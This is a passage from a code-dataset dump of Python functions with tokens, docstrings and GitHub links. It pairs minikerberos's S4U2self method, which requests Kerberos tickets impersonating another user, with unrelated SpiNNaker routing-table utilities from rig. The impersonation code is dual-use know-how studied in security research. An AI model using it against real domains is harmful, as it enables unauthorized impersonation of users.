krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | python | def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | [
"def",
"S4U2self",
"(",
"self",
",",
"user_to_impersonate",
",",
"supp_enc_methods",
"=",
"[",
"EncryptionType",
".",
"DES_CBC_CRC",
",",
"EncryptionType",
".",
"DES_CBC_MD4",
",",
"EncryptionType",
".",
"DES_CBC_MD5",
",",
"EncryptionType",
".",
"DES3_CBC_SHA1",
",",
"EncryptionType",
".",
"ARCFOUR_HMAC_MD5",
",",
"EncryptionType",
".",
"AES256_CTS_HMAC_SHA1_96",
",",
"EncryptionType",
".",
"AES128_CTS_HMAC_SHA1_96",
"]",
")",
":",
"#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):",
"if",
"not",
"self",
".",
"kerberos_TGT",
":",
"logger",
".",
"debug",
"(",
"'S4U2self invoked, but TGT is not available! Fetching TGT...'",
")",
"self",
".",
"get_TGT",
"(",
")",
"supp_enc",
"=",
"self",
".",
"usercreds",
".",
"get_preferred_enctype",
"(",
"supp_enc_methods",
")",
"auth_package_name",
"=",
"'Kerberos'",
"now",
"=",
"datetime",
".",
"datetime",
".",
"utcnow",
"(",
")",
"###### Calculating authenticator data",
"authenticator_data",
"=",
"{",
"}",
"authenticator_data",
"[",
"'authenticator-vno'",
"]",
"=",
"krb5_pvno",
"authenticator_data",
"[",
"'crealm'",
"]",
"=",
"Realm",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'crealm'",
"]",
")",
"authenticator_data",
"[",
"'cname'",
"]",
"=",
"self",
".",
"kerberos_TGT",
"[",
"'cname'",
"]",
"authenticator_data",
"[",
"'cusec'",
"]",
"=",
"now",
".",
"microsecond",
"authenticator_data",
"[",
"'ctime'",
"]",
"=",
"now",
"authenticator_data_enc",
"=",
"self",
".",
"kerberos_cipher",
".",
"encrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"7",
",",
"Authenticator",
"(",
"authenticator_data",
")",
".",
"dump",
"(",
")",
",",
"None",
")",
"ap_req",
"=",
"{",
"}",
"ap_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"ap_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_AP_REQ",
".",
"value",
"ap_req",
"[",
"'ap-options'",
"]",
"=",
"APOptions",
"(",
"set",
"(",
")",
")",
"ap_req",
"[",
"'ticket'",
"]",
"=",
"Ticket",
"(",
"self",
".",
"kerberos_TGT",
"[",
"'ticket'",
"]",
")",
"ap_req",
"[",
"'authenticator'",
"]",
"=",
"EncryptedData",
"(",
"{",
"'etype'",
":",
"self",
".",
"kerberos_cipher_type",
",",
"'cipher'",
":",
"authenticator_data_enc",
"}",
")",
"pa_data_auth",
"=",
"{",
"}",
"pa_data_auth",
"[",
"'padata-type'",
"]",
"=",
"PaDataType",
".",
"TGS_REQ",
".",
"value",
"pa_data_auth",
"[",
"'padata-value'",
"]",
"=",
"AP_REQ",
"(",
"ap_req",
")",
".",
"dump",
"(",
")",
"###### Calculating checksum data",
"S4UByteArray",
"=",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
".",
"to_bytes",
"(",
"4",
",",
"'little'",
",",
"signed",
"=",
"False",
")",
"S4UByteArray",
"+=",
"user_to_impersonate",
".",
"username",
".",
"encode",
"(",
")",
"S4UByteArray",
"+=",
"user_to_impersonate",
".",
"domain",
".",
"encode",
"(",
")",
"S4UByteArray",
"+=",
"auth_package_name",
".",
"encode",
"(",
")",
"logger",
".",
"debug",
"(",
"'S4U2self: S4UByteArray: %s'",
"%",
"S4UByteArray",
".",
"hex",
"(",
")",
")",
"logger",
".",
"debug",
"(",
"'S4U2self: S4UByteArray: %s'",
"%",
"S4UByteArray",
")",
"chksum_data",
"=",
"_HMACMD5",
".",
"checksum",
"(",
"self",
".",
"kerberos_session_key",
",",
"17",
",",
"S4UByteArray",
")",
"logger",
".",
"debug",
"(",
"'S4U2self: chksum_data: %s'",
"%",
"chksum_data",
".",
"hex",
"(",
")",
")",
"chksum",
"=",
"{",
"}",
"chksum",
"[",
"'cksumtype'",
"]",
"=",
"int",
"(",
"CKSUMTYPE",
"(",
"'HMAC_MD5'",
")",
")",
"chksum",
"[",
"'checksum'",
"]",
"=",
"chksum_data",
"###### Filling out PA-FOR-USER data for impersonation",
"pa_for_user_enc",
"=",
"{",
"}",
"pa_for_user_enc",
"[",
"'userName'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"PRINCIPAL",
".",
"value",
",",
"'name-string'",
":",
"user_to_impersonate",
".",
"get_principalname",
"(",
")",
"}",
")",
"pa_for_user_enc",
"[",
"'userRealm'",
"]",
"=",
"user_to_impersonate",
".",
"domain",
"pa_for_user_enc",
"[",
"'cksum'",
"]",
"=",
"Checksum",
"(",
"chksum",
")",
"pa_for_user_enc",
"[",
"'auth-package'",
"]",
"=",
"auth_package_name",
"pa_for_user",
"=",
"{",
"}",
"pa_for_user",
"[",
"'padata-type'",
"]",
"=",
"int",
"(",
"PADATA_TYPE",
"(",
"'PA-FOR-USER'",
")",
")",
"pa_for_user",
"[",
"'padata-value'",
"]",
"=",
"PA_FOR_USER_ENC",
"(",
"pa_for_user_enc",
")",
".",
"dump",
"(",
")",
"###### Constructing body",
"krb_tgs_body",
"=",
"{",
"}",
"krb_tgs_body",
"[",
"'kdc-options'",
"]",
"=",
"KDCOptions",
"(",
"set",
"(",
"[",
"'forwardable'",
",",
"'renewable'",
",",
"'canonicalize'",
"]",
")",
")",
"krb_tgs_body",
"[",
"'sname'",
"]",
"=",
"PrincipalName",
"(",
"{",
"'name-type'",
":",
"NAME_TYPE",
".",
"UNKNOWN",
".",
"value",
",",
"'name-string'",
":",
"[",
"self",
".",
"usercreds",
".",
"username",
"]",
"}",
")",
"krb_tgs_body",
"[",
"'realm'",
"]",
"=",
"self",
".",
"usercreds",
".",
"domain",
".",
"upper",
"(",
")",
"krb_tgs_body",
"[",
"'till'",
"]",
"=",
"now",
"+",
"datetime",
".",
"timedelta",
"(",
"days",
"=",
"1",
")",
"krb_tgs_body",
"[",
"'nonce'",
"]",
"=",
"secrets",
".",
"randbits",
"(",
"31",
")",
"krb_tgs_body",
"[",
"'etype'",
"]",
"=",
"[",
"supp_enc",
".",
"value",
"]",
"#selecting according to server's preferences",
"krb_tgs_req",
"=",
"{",
"}",
"krb_tgs_req",
"[",
"'pvno'",
"]",
"=",
"krb5_pvno",
"krb_tgs_req",
"[",
"'msg-type'",
"]",
"=",
"MESSAGE_TYPE",
".",
"KRB_TGS_REQ",
".",
"value",
"krb_tgs_req",
"[",
"'padata'",
"]",
"=",
"[",
"pa_data_auth",
",",
"pa_for_user",
"]",
"krb_tgs_req",
"[",
"'req-body'",
"]",
"=",
"KDC_REQ_BODY",
"(",
"krb_tgs_body",
")",
"req",
"=",
"TGS_REQ",
"(",
"krb_tgs_req",
")",
"logger",
".",
"debug",
"(",
"'Sending S4U2self request to server'",
")",
"try",
":",
"reply",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
")",
"except",
"KerberosError",
"as",
"e",
":",
"if",
"e",
".",
"errorcode",
".",
"value",
"==",
"16",
":",
"logger",
".",
"error",
"(",
"'S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s'",
"%",
"e",
")",
"raise",
"e",
"logger",
".",
"debug",
"(",
"'Got S4U2self reply, decrypting...'",
")",
"tgs",
"=",
"reply",
".",
"native",
"encTGSRepPart",
"=",
"EncTGSRepPart",
".",
"load",
"(",
"self",
".",
"kerberos_cipher",
".",
"decrypt",
"(",
"self",
".",
"kerberos_session_key",
",",
"8",
",",
"tgs",
"[",
"'enc-part'",
"]",
"[",
"'cipher'",
"]",
")",
")",
".",
"native",
"key",
"=",
"Key",
"(",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keytype'",
"]",
",",
"encTGSRepPart",
"[",
"'key'",
"]",
"[",
"'keyvalue'",
"]",
")",
"self",
".",
"ccache",
".",
"add_tgs",
"(",
"tgs",
",",
"encTGSRepPart",
")",
"logger",
".",
"debug",
"(",
"'Got valid TGS reply'",
")",
"self",
".",
"kerberos_TGS",
"=",
"tgs",
"return",
"tgs",
",",
"encTGSRepPart",
",",
"key"
] | user_to_impersonate : KerberosTarget class | [
"user_to_impersonate",
":",
"KerberosTarget",
"class"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L351-L453 |
project-rig/rig | rig/routing_table/remove_default_routes.py | minimise | def minimise(table, target_length, check_for_aliases=True):
"""Remove from the routing table any entries which could be replaced by
default routing.
Parameters
----------
routing_table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table from which to remove entries which could be handled by
default routing.
target_length : int or None
Target length of the routing table.
check_for_aliases : bool
If True (the default), default-route candidates are checked for aliased
entries before suggesting a route may be default routed. This check is
required to ensure correctness in the general case but has a runtime
complexity of O(N^2) in the worst case for N-entry tables.
If False, the alias-check is skipped resulting in O(N) runtime. This
option should only be used if the supplied table is guaranteed not to
contain any aliased entries.
Raises
------
MinimisationFailedError
If the smallest table that can be produced is larger than
`target_length`.
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Reduced routing table entries.
"""
# If alias checking is required, see if we can cheaply prove that no
# aliases exist in the table to skip this costly check.
if check_for_aliases:
# Aliases cannot exist when all entries share the same mask and all
# keys are unique.
if len(set(e.mask for e in table)) == 1 and \
len(table) == len(set(e.key for e in table)):
check_for_aliases = False
# Generate a new table with default-route entries removed
new_table = list()
for i, entry in enumerate(table):
if not _is_defaultable(i, entry, table, check_for_aliases):
# If the entry cannot be removed then add it to the table
new_table.append(entry)
# If the resultant table is larger than the target raise an exception
if target_length is not None and target_length < len(new_table):
raise MinimisationFailedError(target_length, len(new_table))
return new_table | python | def minimise(table, target_length, check_for_aliases=True):
"""Remove from the routing table any entries which could be replaced by
default routing.
Parameters
----------
routing_table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table from which to remove entries which could be handled by
default routing.
target_length : int or None
Target length of the routing table.
check_for_aliases : bool
If True (the default), default-route candidates are checked for aliased
entries before suggesting a route may be default routed. This check is
required to ensure correctness in the general case but has a runtime
complexity of O(N^2) in the worst case for N-entry tables.
If False, the alias-check is skipped resulting in O(N) runtime. This
option should only be used if the supplied table is guaranteed not to
contain any aliased entries.
Raises
------
MinimisationFailedError
If the smallest table that can be produced is larger than
`target_length`.
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Reduced routing table entries.
"""
# If alias checking is required, see if we can cheaply prove that no
# aliases exist in the table to skip this costly check.
if check_for_aliases:
# Aliases cannot exist when all entries share the same mask and all
# keys are unique.
if len(set(e.mask for e in table)) == 1 and \
len(table) == len(set(e.key for e in table)):
check_for_aliases = False
# Generate a new table with default-route entries removed
new_table = list()
for i, entry in enumerate(table):
if not _is_defaultable(i, entry, table, check_for_aliases):
# If the entry cannot be removed then add it to the table
new_table.append(entry)
# If the resultant table is larger than the target raise an exception
if target_length is not None and target_length < len(new_table):
raise MinimisationFailedError(target_length, len(new_table))
return new_table | [
"def",
"minimise",
"(",
"table",
",",
"target_length",
",",
"check_for_aliases",
"=",
"True",
")",
":",
"# If alias checking is required, see if we can cheaply prove that no",
"# aliases exist in the table to skip this costly check.",
"if",
"check_for_aliases",
":",
"# Aliases cannot exist when all entries share the same mask and all",
"# keys are unique.",
"if",
"len",
"(",
"set",
"(",
"e",
".",
"mask",
"for",
"e",
"in",
"table",
")",
")",
"==",
"1",
"and",
"len",
"(",
"table",
")",
"==",
"len",
"(",
"set",
"(",
"e",
".",
"key",
"for",
"e",
"in",
"table",
")",
")",
":",
"check_for_aliases",
"=",
"False",
"# Generate a new table with default-route entries removed",
"new_table",
"=",
"list",
"(",
")",
"for",
"i",
",",
"entry",
"in",
"enumerate",
"(",
"table",
")",
":",
"if",
"not",
"_is_defaultable",
"(",
"i",
",",
"entry",
",",
"table",
",",
"check_for_aliases",
")",
":",
"# If the entry cannot be removed then add it to the table",
"new_table",
".",
"append",
"(",
"entry",
")",
"# If the resultant table is larger than the target raise an exception",
"if",
"target_length",
"is",
"not",
"None",
"and",
"target_length",
"<",
"len",
"(",
"new_table",
")",
":",
"raise",
"MinimisationFailedError",
"(",
"target_length",
",",
"len",
"(",
"new_table",
")",
")",
"return",
"new_table"
] | Remove from the routing table any entries which could be replaced by
default routing.
Parameters
----------
routing_table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table from which to remove entries which could be handled by
default routing.
target_length : int or None
Target length of the routing table.
check_for_aliases : bool
If True (the default), default-route candidates are checked for aliased
entries before suggesting a route may be default routed. This check is
required to ensure correctness in the general case but has a runtime
complexity of O(N^2) in the worst case for N-entry tables.
If False, the alias-check is skipped resulting in O(N) runtime. This
option should only be used if the supplied table is guaranteed not to
contain any aliased entries.
Raises
------
MinimisationFailedError
If the smallest table that can be produced is larger than
`target_length`.
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Reduced routing table entries. | [
"Remove",
"from",
"the",
"routing",
"table",
"any",
"entries",
"which",
"could",
"be",
"replaced",
"by",
"default",
"routing",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/remove_default_routes.py#L5-L57 |
project-rig/rig | rig/routing_table/remove_default_routes.py | _is_defaultable | def _is_defaultable(i, entry, table, check_for_aliases=True):
"""Determine if an entry may be removed from a routing table and be
replaced by a default route.
Parameters
----------
i : int
Position of the entry in the table
entry : RoutingTableEntry
The entry itself
table : [RoutingTableEntry, ...]
The table containing the entry.
check_for_aliases : bool
If True, the table is checked for aliased entries before suggesting a
route may be default routed.
"""
# May only have one source and sink (which may not be None)
if (len(entry.sources) == 1 and
len(entry.route) == 1 and
None not in entry.sources):
# Neither the source nor sink may be a core
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if source.is_link and sink.is_link:
# The source must be going in the same direction as the link
if source.opposite is sink:
# And the entry must not be aliased
key, mask = entry.key, entry.mask
if not check_for_aliases or \
not any(intersect(key, mask, d.key, d.mask) for
d in table[i+1:]):
return True
return False | python | def _is_defaultable(i, entry, table, check_for_aliases=True):
"""Determine if an entry may be removed from a routing table and be
replaced by a default route.
Parameters
----------
i : int
Position of the entry in the table
entry : RoutingTableEntry
The entry itself
table : [RoutingTableEntry, ...]
The table containing the entry.
check_for_aliases : bool
If True, the table is checked for aliased entries before suggesting a
route may be default routed.
"""
# May only have one source and sink (which may not be None)
if (len(entry.sources) == 1 and
len(entry.route) == 1 and
None not in entry.sources):
# Neither the source nor sink may be a core
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if source.is_link and sink.is_link:
# The source must be going in the same direction as the link
if source.opposite is sink:
# And the entry must not be aliased
key, mask = entry.key, entry.mask
if not check_for_aliases or \
not any(intersect(key, mask, d.key, d.mask) for
d in table[i+1:]):
return True
return False | [
"def",
"_is_defaultable",
"(",
"i",
",",
"entry",
",",
"table",
",",
"check_for_aliases",
"=",
"True",
")",
":",
"# May only have one source and sink (which may not be None)",
"if",
"(",
"len",
"(",
"entry",
".",
"sources",
")",
"==",
"1",
"and",
"len",
"(",
"entry",
".",
"route",
")",
"==",
"1",
"and",
"None",
"not",
"in",
"entry",
".",
"sources",
")",
":",
"# Neither the source nor sink may be a core",
"source",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"sources",
")",
")",
"sink",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"route",
")",
")",
"if",
"source",
".",
"is_link",
"and",
"sink",
".",
"is_link",
":",
"# The source must be going in the same direction as the link",
"if",
"source",
".",
"opposite",
"is",
"sink",
":",
"# And the entry must not be aliased",
"key",
",",
"mask",
"=",
"entry",
".",
"key",
",",
"entry",
".",
"mask",
"if",
"not",
"check_for_aliases",
"or",
"not",
"any",
"(",
"intersect",
"(",
"key",
",",
"mask",
",",
"d",
".",
"key",
",",
"d",
".",
"mask",
")",
"for",
"d",
"in",
"table",
"[",
"i",
"+",
"1",
":",
"]",
")",
":",
"return",
"True",
"return",
"False"
] | Determine if an entry may be removed from a routing table and be
replaced by a default route.
Parameters
----------
i : int
Position of the entry in the table
entry : RoutingTableEntry
The entry itself
table : [RoutingTableEntry, ...]
The table containing the entry.
check_for_aliases : bool
If True, the table is checked for aliased entries before suggesting a
route may be default routed. | [
"Determine",
"if",
"an",
"entry",
"may",
"be",
"removed",
"from",
"a",
"routing",
"table",
"and",
"be",
"replaced",
"by",
"a",
"default",
"route",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/remove_default_routes.py#L60-L93 |
project-rig/rig | rig/routing_table/utils.py | routing_tree_to_tables | def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables | python | def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables | [
"def",
"routing_tree_to_tables",
"(",
"routes",
",",
"net_keys",
")",
":",
"# Pairs of inbound and outbound routes.",
"InOutPair",
"=",
"namedtuple",
"(",
"\"InOutPair\"",
",",
"\"ins, outs\"",
")",
"# {(x, y): {(key, mask): _InOutPair}}",
"route_sets",
"=",
"defaultdict",
"(",
"OrderedDict",
")",
"for",
"net",
",",
"routing_tree",
"in",
"iteritems",
"(",
"routes",
")",
":",
"key",
",",
"mask",
"=",
"net_keys",
"[",
"net",
"]",
"# The direction is the Links entry which describes the direction in",
"# which we last moved to reach the node (or None for the root).",
"for",
"direction",
",",
"(",
"x",
",",
"y",
")",
",",
"out_directions",
"in",
"routing_tree",
".",
"traverse",
"(",
")",
":",
"# Determine the in_direction",
"in_direction",
"=",
"direction",
"if",
"in_direction",
"is",
"not",
"None",
":",
"in_direction",
"=",
"direction",
".",
"opposite",
"# Add a routing entry",
"if",
"(",
"key",
",",
"mask",
")",
"in",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
":",
"# If there is an existing route set raise an error if the out",
"# directions are not equivalent.",
"if",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
"[",
"(",
"key",
",",
"mask",
")",
"]",
".",
"outs",
"!=",
"out_directions",
":",
"raise",
"MultisourceRouteError",
"(",
"key",
",",
"mask",
",",
"(",
"x",
",",
"y",
")",
")",
"# Otherwise, add the input directions as this represents a",
"# merge of the routes.",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
"[",
"(",
"key",
",",
"mask",
")",
"]",
".",
"ins",
".",
"add",
"(",
"in_direction",
")",
"else",
":",
"# Otherwise create a new route set",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
"[",
"(",
"key",
",",
"mask",
")",
"]",
"=",
"InOutPair",
"(",
"{",
"in_direction",
"}",
",",
"set",
"(",
"out_directions",
")",
")",
"# Construct the routing tables from the route sets",
"routing_tables",
"=",
"defaultdict",
"(",
"list",
")",
"for",
"(",
"x",
",",
"y",
")",
",",
"routes",
"in",
"iteritems",
"(",
"route_sets",
")",
":",
"for",
"(",
"key",
",",
"mask",
")",
",",
"route",
"in",
"iteritems",
"(",
"routes",
")",
":",
"# Add the route",
"routing_tables",
"[",
"(",
"x",
",",
"y",
")",
"]",
".",
"append",
"(",
"RoutingTableEntry",
"(",
"route",
".",
"outs",
",",
"key",
",",
"mask",
",",
"route",
".",
"ins",
")",
")",
"return",
"routing_tables"
] | Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
